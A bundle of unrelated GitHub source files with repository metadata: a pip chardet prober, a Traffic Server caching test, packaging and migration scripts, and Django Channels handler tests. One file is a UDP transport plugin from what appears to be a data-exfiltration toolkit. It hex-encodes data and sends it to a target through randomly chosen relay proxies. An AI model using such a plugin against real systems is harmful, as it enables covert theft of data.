        self.coding_sm = CodingStateMachine(SJIS_SM_MODEL)
        self.distribution_analyzer = SJISDistributionAnalysis()
        self.context_analyzer = SJISContextAnalysis()
        self.reset()
    def reset(self):
        # NOTE(review): the distribution analyzer is presumably reset by
        # the base class -- confirm in MultiByteCharSetProber.reset().
        super().reset()
        self.context_analyzer.reset()
    @property
    def charset_name(self):
        return self.context_analyzer.charset_name
    @property
    def language(self):
        return "Japanese"
    def feed(self, byte_str):
        """Feed bytes through the state machine and both analyzers.

        Returns the resulting probing state (DETECTING, FOUND_IT or
        NOT_ME).
        """
        for i, byte in enumerate(byte_str):
            coding_state = self.coding_sm.next_state(byte)
            if coding_state == MachineState.ERROR:
                # Structurally impossible byte for this encoding: bail.
                self.logger.debug(
                    "%s %s prober hit error at byte %s",
                    self.charset_name,
                    self.language,
                    i,
                )
                self._state = ProbingState.NOT_ME
                break
            if coding_state == MachineState.ITS_ME:
                self._state = ProbingState.FOUND_IT
                break
            if coding_state == MachineState.START:
                char_len = self.coding_sm.get_current_charlen()
                if i == 0:
                    # A character may straddle two feed() calls; stitch
                    # its first byte back from self._last_char.
                    self._last_char[1] = byte
                    self.context_analyzer.feed(
                        self._last_char[2 - char_len :], char_len
                    )
                    self.distribution_analyzer.feed(self._last_char, char_len)
                else:
                    self.context_analyzer.feed(
                        byte_str[i + 1 - char_len : i + 3 - char_len], char_len
                    )
                    self.distribution_analyzer.feed(byte_str[i - 1 : i + 1], char_len)
        # Remember the final byte for the next call's stitching above.
        self._last_char[0] = byte_str[-1]
        if self.state == ProbingState.DETECTING:
            # Declare victory early once the context analysis has seen
            # enough data and confidence clears the shortcut threshold.
            if self.context_analyzer.got_enough_data() and (
                self.get_confidence() > self.SHORTCUT_THRESHOLD
            ):
                self._state = ProbingState.FOUND_IT
        return self.state
    def get_confidence(self):
        # Report the more optimistic of the two independent analyses.
        context_conf = self.context_analyzer.get_confidence()
        distrib_conf = self.distribution_analyzer.get_confidence()
        return max(context_conf, distrib_conf)
| {
"content_hash": "958af939fd40f0b9fa11d4521253c9f5",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 86,
"avg_line_length": 36.394366197183096,
"alnum_prop": 0.5626934984520123,
"repo_name": "pfmoore/pip",
"id": "3bcbdb71d1639b5cac8ff9c4461e1e36f6f4bb17",
"size": "3749",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "src/pip/_vendor/chardet/sjisprober.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3137"
},
{
"name": "PowerShell",
"bytes": "2137"
},
{
"name": "Python",
"bytes": "7138085"
}
],
"symlink_target": ""
} |
'''
Test cached responses and requests with bodies
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
Test.Summary = '''
Test revalidating cached objects
'''
testName = "RevalidateCacheObject"
# Needs Curl
Test.SkipUnless(
    Condition.HasProgram("curl", "curl needs to be installed on system for this test to work"),
)
Test.ContinueOnFail = True
# Set up Origin server
# request_header is from ATS to origin; response from Origin to ATS
# lookup_key is to make unique response in origin for header "UID" that will pass in ATS request
server = Test.MakeOriginServer("server",lookup_key="{%UID}")
# Initial request
# Short max-age=1 so the object goes stale quickly between test runs.
request_header = {"headers": "GET / HTTP/1.1\r\nHost: www.example.com\r\nUID: Fill\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\nLast-Modified: Tue, 08 May 2018 15:49:41 GMT\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": "xxx"}
server.addResponse("sessionlog.json", request_header, response_header)
# IMS revalidation request
# Origin answers If-Modified-Since revalidation with a bodyless 304.
request_IMS_header = {"headers": "GET / HTTP/1.1\r\nUID: IMS\r\nIf-Modified-Since: Tue, 08 May 2018 15:49:41 GMT\r\nHost: www.example.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_IMS_header = {"headers": "HTTP/1.1 304 Not Modified\r\nConnection: close\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": None}
server.addResponse("sessionlog.json", request_IMS_header, response_IMS_header)
# EtagFill
request_etagfill_header = {"headers": "GET /etag HTTP/1.1\r\nHost: www.example.com\r\nUID: EtagFill\r\n\r\n", "timestamp": "1469733493.993", "body": None}
response_etagfill_header = {"headers": "HTTP/1.1 200 OK\r\nETag: myetag\r\nConnection: close\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": "xxx"}
server.addResponse("sessionlog.json", request_etagfill_header, response_etagfill_header)
# INM revalidation
# Origin answers If-None-Match revalidation with a bodyless 304.
request_INM_header = {"headers": "GET /etag HTTP/1.1\r\nUID: INM\r\nIf-None-Match: myetag\r\nHost: www.example.com\r\n\r\n", "timestamp": "1469733493.993", "body": None}
response_INM_header = {"headers": "HTTP/1.1 304 Not Modified\r\nConnection: close\r\nETag: myetag\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": None}
server.addResponse("sessionlog.json", request_INM_header, response_INM_header)
# object changed to 0 byte
request_noBody_header = {"headers": "GET / HTTP/1.1\r\nUID: noBody\r\nHost: www.example.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_noBody_header = {"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\nCache-Control: max-age=3\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
server.addResponse("sessionlog.json", request_noBody_header, response_noBody_header)
# etag object now is a 404. Yeah, 404s don't usually have Cache-Control, but, ATS's default is to cache 404s for a while.
request_etagfill_header = {"headers": "GET /etag HTTP/1.1\r\nHost: www.example.com\r\nUID: EtagError\r\n\r\n", "timestamp": "1469733493.993", "body": None}
response_etagfill_header = {"headers": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 0\r\nCache-Control: max-age=3\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
server.addResponse("sessionlog.json", request_etagfill_header, response_etagfill_header)
# ATS Configuration
ts = Test.MakeATSProcess("ts", select_ports=False)
# xdebug.so enables the x-debug request header used below so the gold files
# can assert on x-cache / x-cache-key / via.
ts.Disk.plugin_config.AddLine('xdebug.so')
ts.Disk.records_config.update({
    'proxy.config.diags.debug.enabled': 1,
    'proxy.config.diags.debug.tags': 'http',
    'proxy.config.http.response_via_str': 3,
    'proxy.config.http.cache.http': 1,
    'proxy.config.http.wait_for_cache': 1,
})
ts.Disk.remap_config.AddLine(
    'map / http://127.0.0.1:{0}'.format(server.Variables.Port)
)
# Test 0 - Fill a 3 byte object with Last-Modified time into cache.
tr = Test.AddTestRun()
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(ts, ready=1)
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: Fill" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-miss.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 1 - Once it goes stale, fetch it again. We expect Origin to get IMS request, and serve a 304. We expect ATS to refresh the object, and give a 200 to user
tr = Test.AddTestRun()
# DelayStart exceeds the object's max-age=1, guaranteeing staleness.
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: IMS" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 2 - Once it goes stale, fetch it via a range request. We expect Origin to get IMS request, and serve a 304. We expect ATS to refresh the object, and give a 206 to user
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl --range 0-1 -s -D - -v --ipv4 --http1.1 -H"UID: IMS" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale-206.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 3 - Fill a new object with an Etag. Not checking the output here.
tr = Test.AddTestRun()
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: EtagFill" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 4 - Once the etag object goes stale, fetch it again. We expect Origin to get INM request, and serve a 304. We expect ATS to refresh the object, and give a 200 to user
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: INM" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale-INM.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 5 - Once the etag object goes stale, fetch it via a range request. We expect Origin to get INM request, and serve a 304. We expect ATS to refresh the object, and give a 206 to user
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl --range 0-1 -s -D - -v --ipv4 --http1.1 -H"UID: INM" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale-206-etag.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 6 - The origin changes the initial LMT object to 0 byte. We expect ATS to fetch and serve the new 0 byte object.
tr = Test.AddTestRun()
tr.DelayStart=3
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: noBody" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_nobody-hit-stale.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 7 - Fetch the new 0 byte object again when fresh in cache to ensure its still a 0 byte object.
tr = Test.AddTestRun()
tr.DelayStart=3
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: noBody" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_nobody-hit-stale.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 8 - The origin changes the etag object to 0 byte 404. We expect ATS to fetch and serve the 404 0 byte object.
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: EtagError" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_error_nobody.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 9 - Fetch the 0 byte etag object again when fresh in cache to ensure its still a 0 byte object
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: EtagError" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_error_nobody.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
| {
"content_hash": "4810ceb54dc7b066c005b17479111068",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 207,
"avg_line_length": 58.958333333333336,
"alnum_prop": 0.7287228672387683,
"repo_name": "chitianhao/trafficserver",
"id": "a8dabae52aa9e5539cd014a53ceb143c2ed460d6",
"size": "9905",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/gold_tests/headers/cachedIMSRange.test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1481933"
},
{
"name": "C++",
"bytes": "12818807"
},
{
"name": "CMake",
"bytes": "18505"
},
{
"name": "Dockerfile",
"bytes": "3283"
},
{
"name": "Java",
"bytes": "9881"
},
{
"name": "JavaScript",
"bytes": "1609"
},
{
"name": "Lex",
"bytes": "4029"
},
{
"name": "Lua",
"bytes": "39258"
},
{
"name": "M4",
"bytes": "187086"
},
{
"name": "Makefile",
"bytes": "195501"
},
{
"name": "Objective-C",
"bytes": "15182"
},
{
"name": "Perl",
"bytes": "110166"
},
{
"name": "Python",
"bytes": "705967"
},
{
"name": "Shell",
"bytes": "119499"
},
{
"name": "Vim script",
"bytes": "192"
},
{
"name": "Yacc",
"bytes": "3255"
},
{
"name": "sed",
"bytes": "131"
}
],
"symlink_target": ""
} |
"""
Setup file for TimeseriesDB.
This file was generated with PyScaffold 2.5.6, a tool that easily
puts up a scaffold for your new Python project. Learn more under:
http://pyscaffold.readthedocs.org/
"""
import sys
from setuptools import setup
def setup_package():
    """Invoke setuptools, pulling in Sphinx only for documentation commands."""
    wants_docs = {'build_sphinx', 'upload_docs'} & set(sys.argv)
    doc_requires = ['sphinx'] if wants_docs else []
    setup(
        setup_requires=['six', 'pyscaffold>=2.5a0,<2.6a0'] + doc_requires,
        use_pyscaffold=True,
    )


if __name__ == "__main__":
    setup_package()
| {
"content_hash": "cc5a156b386ae50118bc20c17be529b5",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 73,
"avg_line_length": 26.571428571428573,
"alnum_prop": 0.6612903225806451,
"repo_name": "slac207/cs207project",
"id": "4cb277b4c5b8a27d0fc777a76d49ae0c3904bf9c",
"size": "604",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "TimeseriesDB/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1416"
},
{
"name": "HTML",
"bytes": "4380"
},
{
"name": "JavaScript",
"bytes": "135139"
},
{
"name": "Jupyter Notebook",
"bytes": "59899"
},
{
"name": "Python",
"bytes": "274063"
},
{
"name": "Shell",
"bytes": "10378"
}
],
"symlink_target": ""
} |
import socket
import sys
from random import choice
# Transport configuration dict, injected by Plugin.__init__ at registration
# time; the functions below read the keys 'target', 'port' and (optionally)
# 'proxies'.
config = None
# Framework handle providing log_message()/retrieve_data(); injected by
# Plugin.__init__.
app_exfiltrate = None
def send(data):
    """
    Send one chunk of data hex-encoded over UDP.

    The destination is picked at random from the configured target plus any
    configured proxies; otherwise the target alone is used.
    """
    # 'in' instead of the Python-2-only dict.has_key().
    if 'proxies' in config and config['proxies'] != [""]:
        targets = [config['target']] + config['proxies']
        target = choice(targets)
    else:
        target = config['target']
    port = config['port']
    app_exfiltrate.log_message(
        'info', "[udp] Sending {0} bytes to {1}".format(len(data), target))
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # Payload is hex-encoded to match the decode('hex') in sniff().
        client_socket.sendto(data.encode('hex'), (target, port))
    finally:
        # Close explicitly instead of leaking the socket until GC.
        client_socket.close()
def listen():
    """Run a UDP listener that feeds received payloads back to the framework."""
    receive_callback = app_exfiltrate.retrieve_data
    sniff(handler=receive_callback)
def sniff(handler):
    """
    Bind a UDP socket on the configured port and pass every received,
    hex-decoded datagram to *handler*. Exits the whole process when the
    port cannot be bound. Runs until interrupted.
    """
    port = config['port']
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # '' binds on all interfaces.
        server_address = ('', port)
        sock.bind(server_address)
        app_exfiltrate.log_message(
            'info', "[udp] Starting server on port {}...".format(port))
    except socket.error as e:
        app_exfiltrate.log_message(
            'warning', "[udp] Couldn't bind on port {}...".format(port))
        sys.exit(-1)
    while True:
        app_exfiltrate.log_message('info', "[udp] Waiting for connections...")
        try:
            while True:
                # 65535 is the maximum possible UDP datagram size.
                data, client_address = sock.recvfrom(65535)
                app_exfiltrate.log_message(
                    'info', "[udp] client connected: {}".format(client_address))
                if data:
                    app_exfiltrate.log_message(
                        'info', "[udp] Received {} bytes".format(len(data)))
                    try:
                        # Senders hex-encode payloads (see send()); decode
                        # before handing off. Python-2-only str.decode('hex').
                        data = data.decode('hex')
                        #app_exfiltrate.retrieve_data(data)
                        handler(data)
                    except Exception as e:
                        # Malformed datagrams are logged and skipped, not fatal.
                        app_exfiltrate.log_message(
                            'warning', "[udp] Failed decoding message {}".format(e))
                else:
                    # Empty datagram: drop back to the outer loop.
                    break
        finally:
            pass
def relay_dns_packet(data):
    """Forward a packet received in proxy mode on to the configured target."""
    target = config['target']
    port = config['port']
    size = len(data)
    app_exfiltrate.log_message(
        'info', "[proxy] [udp] Relaying {0} bytes to {1}".format(size, target))
    relay_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    relay_socket.sendto(data.encode('hex'), (target, port))
def proxy():
    """Listen for UDP packets and relay each one to the real target."""
    app_exfiltrate.log_message(
        'info', "[proxy] [udp] Listening for udp packets")
    sniff(handler=relay_dns_packet)
class Plugin:
    """Entry point that wires the UDP transport into the host framework."""

    def __init__(self, app, conf):
        # Expose the framework handle and configuration to the module-level
        # transport functions, then register them under the 'udp' name.
        global config, app_exfiltrate
        config = conf
        app_exfiltrate = app
        app.register_plugin('udp', {'send': send, 'listen': listen, 'proxy': proxy})
| {
"content_hash": "c801ec13a19fb62cb9396611ed0d36e3",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 84,
"avg_line_length": 33.407407407407405,
"alnum_prop": 0.5554323725055432,
"repo_name": "chokepoint/DET",
"id": "8b0b1da45b863911e86735208e6225e234a19914",
"size": "2706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/udp.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "18354"
},
{
"name": "PowerShell",
"bytes": "11831"
},
{
"name": "Python",
"bytes": "74290"
}
],
"symlink_target": ""
} |
"""empty message
Revision ID: 272e7cd352f9
Revises: 2e825c2c80c7
Create Date: 2016-01-19 19:57:57.224831
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '272e7cd352f9'
# Parent revision this migration applies on top of.
down_revision = '2e825c2c80c7'
def upgrade():
    # Add a Text column to 'workflow' for storing the workflow's result.
    op.add_column('workflow', sa.Column('result', sa.Text))
def downgrade():
    # Reverse of upgrade(): drop the result column again.
    op.drop_column('workflow', 'result')
| {
"content_hash": "8407d3a7881060a330c2ee7992bcecc8",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 59,
"avg_line_length": 18.761904761904763,
"alnum_prop": 0.7233502538071066,
"repo_name": "stackforge/solum",
"id": "fdc93138d40f5262742eee8ec90435bfd929f6ad",
"size": "941",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "solum/objects/sqlalchemy/migration/alembic_migrations/versions/272e7cd352f9_add_result_column_to_workflow_table.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "958"
},
{
"name": "Python",
"bytes": "1243294"
},
{
"name": "Shell",
"bytes": "80784"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import os
from datetime import datetime
from itertools import islice
from django.http import FileResponse, HttpResponse, HttpResponseRedirect, JsonResponse, StreamingHttpResponse
from six import BytesIO
from channels import Channel
from channels.handler import AsgiHandler
from channels.test import ChannelTestCase
class FakeAsgiHandler(AsgiHandler):
    """
    Handler subclass that just returns a premade response rather than
    go into the view subsystem.
    """

    # Deliberately tiny so the tests can exercise multi-chunk responses.
    chunk_size = 30

    def __init__(self, response):
        # Raise explicitly rather than via ``assert``, which is stripped
        # when Python runs with -O.
        if not isinstance(response, (HttpResponse, StreamingHttpResponse)):
            raise TypeError(
                "response must be an HttpResponse or StreamingHttpResponse")
        self._response = response
        super(FakeAsgiHandler, self).__init__()

    def get_response(self, request):
        # Ignore the request entirely and hand back the canned response.
        return self._response
class HandlerTests(ChannelTestCase):
    """
    Tests that the handler works correctly and round-trips things into a
    correct response.
    """

    def test_basic(self):
        """
        Tests a simple request
        """
        # Make stub request and desired response
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = HttpResponse(b"Hi there!", content_type="text/plain")
        # Run the handler
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        # Make sure we got the right number of messages
        self.assertEqual(len(reply_messages), 1)
        reply_message = reply_messages[0]
        # Make sure the message looks correct
        self.assertEqual(reply_message["content"], b"Hi there!")
        self.assertEqual(reply_message["status"], 200)
        self.assertEqual(reply_message.get("more_content", False), False)
        self.assertEqual(
            reply_message["headers"],
            [
                (b"Content-Type", b"text/plain"),
            ],
        )

    def test_cookies(self):
        # A signed cookie set on the response must surface as a header
        # after Content-Type.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = HttpResponse(b"Hi there!", content_type="text/plain")
        response.set_signed_cookie('foo', '1', expires=datetime.now())
        # Run the handler
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        # Make sure we got the right number of messages
        self.assertEqual(len(reply_messages), 1)
        reply_message = reply_messages[0]
        # Make sure the message looks correct
        self.assertEqual(reply_message["content"], b"Hi there!")
        self.assertEqual(reply_message["status"], 200)
        self.assertEqual(reply_message.get("more_content", False), False)
        self.assertEqual(reply_message["headers"][0], (b'Content-Type', b'text/plain'))
        self.assertIn('foo=', reply_message["headers"][1][1].decode())

    def test_headers(self):
        # Custom headers set on the response round-trip; deleted ones must
        # be absent from the reply.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = HttpResponse(b"Hi there!", content_type="text/plain")
        response['foo'] = 1
        response['bar'] = 1
        del response['bar']
        # NOTE(review): presumably relies on Django silently ignoring the
        # deletion of a missing header rather than raising — confirm against
        # the Django version in use.
        del response['nonexistant_key']
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        # Make sure we got the right number of messages
        self.assertEqual(len(reply_messages), 1)
        reply_message = reply_messages[0]
        # Make sure the message looks correct
        self.assertEqual(reply_message["content"], b"Hi there!")
        header_dict = dict(reply_messages[0]['headers'])
        self.assertEqual(header_dict[b'foo'].decode(), '1')
        self.assertNotIn('bar', header_dict)

    def test_large(self):
        """
        Tests a large response (will need chunking)
        """
        # Make stub request and desired response; the body is longer than
        # FakeAsgiHandler.chunk_size (30), forcing two messages.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = HttpResponse(
            b"Thefirstthirtybytesisrighthereandhereistherest")
        # Run the handler
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        # Make sure we got the right number of messages
        self.assertEqual(len(reply_messages), 2)
        # Make sure the messages look correct
        self.assertEqual(reply_messages[0][
            "content"], b"Thefirstthirtybytesisrighthere")
        self.assertEqual(reply_messages[0]["status"], 200)
        self.assertEqual(reply_messages[0]["more_content"], True)
        self.assertEqual(reply_messages[1]["content"], b"andhereistherest")
        self.assertEqual(reply_messages[1].get("more_content", False), False)

    def test_empty(self):
        """
        Tests an empty response
        """
        # Make stub request and desired response
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = HttpResponse(b"", status=304)
        # Run the handler
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True))
        )
        # Make sure we got the right number of messages
        self.assertEqual(len(reply_messages), 1)
        # Make sure the messages look correct
        self.assertEqual(reply_messages[0].get("content", b""), b"")
        self.assertEqual(reply_messages[0]["status"], 304)
        self.assertEqual(reply_messages[0]["more_content"], False)

    def test_empty_streaming(self):
        """
        Tests an empty streaming response
        """
        # Make stub request and desired response
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = StreamingHttpResponse([], status=304)
        # Run the handler
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True))
        )
        # Make sure we got the right number of messages
        self.assertEqual(len(reply_messages), 1)
        # Make sure the messages look correct
        self.assertEqual(reply_messages[0].get("content", b""), b"")
        self.assertEqual(reply_messages[0]["status"], 304)
        self.assertEqual(reply_messages[0]["more_content"], False)

    def test_chunk_bytes(self):
        """
        Makes sure chunk_bytes works correctly
        """
        # Empty string should still return one chunk
        result = list(FakeAsgiHandler.chunk_bytes(b""))
        self.assertEqual(len(result), 1)
        self.assertEqual(result[0][0], b"")
        self.assertEqual(result[0][1], True)
        # Below chunk size
        result = list(FakeAsgiHandler.chunk_bytes(
            b"12345678901234567890123456789"))
        self.assertEqual(len(result), 1)
        self.assertEqual(result[0][0], b"12345678901234567890123456789")
        self.assertEqual(result[0][1], True)
        # Exactly chunk size
        result = list(FakeAsgiHandler.chunk_bytes(
            b"123456789012345678901234567890"))
        self.assertEqual(len(result), 1)
        self.assertEqual(result[0][0], b"123456789012345678901234567890")
        self.assertEqual(result[0][1], True)
        # Just above chunk size
        result = list(FakeAsgiHandler.chunk_bytes(
            b"123456789012345678901234567890a"))
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0][0], b"123456789012345678901234567890")
        self.assertEqual(result[0][1], False)
        self.assertEqual(result[1][0], b"a")
        self.assertEqual(result[1][1], True)

    def test_iterator(self):
        # A non-bytes iterable body (range) is coerced into a byte string.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = HttpResponse(range(10))
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        self.assertEqual(len(reply_messages), 1)
        self.assertEqual(reply_messages[0]["content"], b"0123456789")

    def test_streaming_data(self):
        # Each streamed item becomes its own message, plus a final closing one.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = StreamingHttpResponse('Line: %s' % i for i in range(10))
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        self.assertEqual(len(reply_messages), 11)
        self.assertEqual(reply_messages[0]["content"], b"Line: 0")
        self.assertEqual(reply_messages[9]["content"], b"Line: 9")

    def test_real_file_response(self):
        # A FileResponse over a real on-disk file streams and then drains it.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        current_dir = os.path.realpath(os.path.join(
            os.getcwd(), os.path.dirname(__file__)))
        response = FileResponse(
            open(os.path.join(current_dir, 'a_file'), 'rb'))
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        self.assertEqual(len(reply_messages), 2)
        self.assertEqual(response.getvalue(), b'')

    def test_bytes_file_response(self):
        # FileResponse over an in-memory BytesIO behaves like a file.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = FileResponse(BytesIO(b'sadfdasfsdfsadf'))
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        self.assertEqual(len(reply_messages), 2)

    def test_string_file_response(self):
        # A plain string is iterated character by character by FileResponse.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = FileResponse('abcd')
        handler = FakeAsgiHandler(response)
        reply_messages = list(
            handler(self.get_next_message("test", require=True)))
        self.assertEqual(len(reply_messages), 5)

    def test_non_streaming_file_response(self):
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        response = FileResponse(BytesIO(b'sadfdasfsdfsadf'))
        # This is to test the exception handling. This would only happening if
        # the StreamingHttpResponse was incorrectly subclassed.
        response.streaming = False
        handler = FakeAsgiHandler(response)
        with self.assertRaises(AttributeError):
            list(handler(self.get_next_message("test", require=True)))

    def test_unclosable_filelike_object(self):
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
        # This is a readable object that cannot be closed.
        class Unclosable:
            def read(self, n=-1):
                # Nothing to see here
                return b""
        response = FileResponse(Unclosable())
        handler = FakeAsgiHandler(response)
        # islice guards the test against an accidental infinite stream.
        reply_messages = list(islice(handler(self.get_next_message("test", require=True)), 5))
        self.assertEqual(len(reply_messages), 1)
        response.close()

    def test_json_response(self):
        # JsonResponse bodies serialize tuples as JSON arrays.
        Channel("test").send({
            "reply_channel": "test",
            "http_version": "1.1",
            "method": "GET",
            "path": b"/test/",
        })
